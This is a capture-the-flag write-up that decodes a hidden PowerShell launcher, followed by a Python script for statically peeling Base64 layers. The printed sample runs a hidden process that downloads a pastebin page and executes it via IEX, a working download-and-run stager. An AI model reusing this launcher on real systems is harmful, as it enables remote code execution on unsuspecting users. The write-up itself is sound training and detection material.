Anomaly 6

Points: 78

An automated alert notified your security team to a potentially malicious script being executed on a user's machine. Your job is to analyze the script to determine what it is doing. Note: During your analysis, the script should lead you to a sentence in English; this will be the answer you submit.


The provided file is a PowerShell script:

C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe  if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(''KEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9RWlhkVWVFYiIpLkNvbnRlbnQ='')))';
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);

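You don’t really need to know PowerShell syntax to solve this problem. The Base64 string assigned to $s.Arguments on line 4 looks fishy: it is decoded and passed to IEX (Invoke-Expression), so whatever it contains gets executed. Let’s decode it.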

$ base64 -D
KEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9RWlhkVWVFYiIpLkNvbnRlbnQ=
(Invoke-WebRequest -Uri "https://pastebin.com/raw/QZXdUeEb").Content

Let’s go to the URL “https://pastebin.com/raw/QZXdUeEb”. There we find the answer: “buzzin radars is buzzin yah yah yah yah”.
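The manual decode above can be turned into a static triage helper for similar alerts. The following is an added example, not part of the original write-up: it extracts every FromBase64String argument, decodes it without executing or fetching anything, and follows nested layers. It goes beyond the page's single UTF-8 layer by also handling UTF-16LE blobs; the function names and the depth limit are assumptions.

```python
import base64
import re

# The $s.Arguments line of the script shown on this page.
SAMPLE = ("$s.Arguments='IEX([System.Text.Encoding]::UTF8.GetString("
          "[System.Convert]::FromBase64String(''"
          "KEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9RWlhkVWVFYiIpLkNvbnRlbnQ="
          "'')))';")

# Quotes may be doubled ('') when the call sits inside a single-quoted PowerShell string.
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]+([A-Za-z0-9+/=]+)['\"]+\s*\)", re.I)
IEX = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>)]+", re.I)


def decode_blob(b64):
    """Decode one Base64 blob to text without executing anything."""
    raw = base64.b64decode(b64, validate=True)
    # UTF-16LE payloads: every second byte of ASCII text is NUL.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def triage(script, max_depth=5):
    """Peel nested FromBase64String layers; report decoded text and URLs per layer."""
    findings, queue = [], [(script, 0)]
    while queue:
        text, depth = queue.pop()
        for match in B64_CALL.finditer(text):
            try:
                decoded = decode_blob(match.group(1))
            except ValueError:  # not valid Base64, skip it
                continue
            findings.append({
                "depth": depth + 1,
                "passed_to_iex": bool(IEX.search(text)),  # enclosing layer calls IEX
                "decoded": decoded,
                "urls": URL.findall(decoded),
            })
            if depth + 1 < max_depth:
                queue.append((decoded, depth + 1))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A finding with `passed_to_iex` set and a non-empty `urls` list is the download-and-execute pattern seen in this challenge, and the extracted URL can go straight into proxy or DNS log searches.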